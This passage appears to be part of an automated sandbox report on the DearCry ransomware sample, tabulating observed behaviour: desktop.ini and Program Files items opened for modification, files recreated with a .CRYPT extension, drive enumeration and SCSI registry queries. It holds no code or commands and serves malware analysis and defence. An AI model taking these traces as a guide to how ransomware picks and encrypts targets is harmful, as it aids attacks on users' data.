| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Windows\explorer.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini | C:\Windows\explorer.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\PROGRAM FILES\WINDOWSAPPS\MICROSOFT.VCLIBS.140.00.UWPDESKTOP_14.0.27629.0_X64__8WEKYB3D8BBWE\MICROSOFT.SYSTEM.PACKAGE.METADATA\AUTOGEN\readme.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-400_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\System.Windows.Controls.Ribbon.resources.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\fxplugins.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\csi.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libskiptags_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fr-FR\View3d\3DViewerProductDescription-universal.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-150_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\legal\jdk\mesa3d.md | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-16_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.187.41\msedgeupdateres_it.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrwbin_xl.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ODATACPP.DLL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\MicrosoftLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt58.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-1.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\wintlim.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\System\mfc140u.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FirstRunMailBlurred.layoutdir-RTL.jpg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-48.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\LargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\UIAutomationClientSideProviders.resources.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.WebClient.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\snooze.contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreLogo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\es\UIAutomationClient.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\UIAutomationClientSideProviders.resources.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\System.Windows.Controls.Ribbon.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
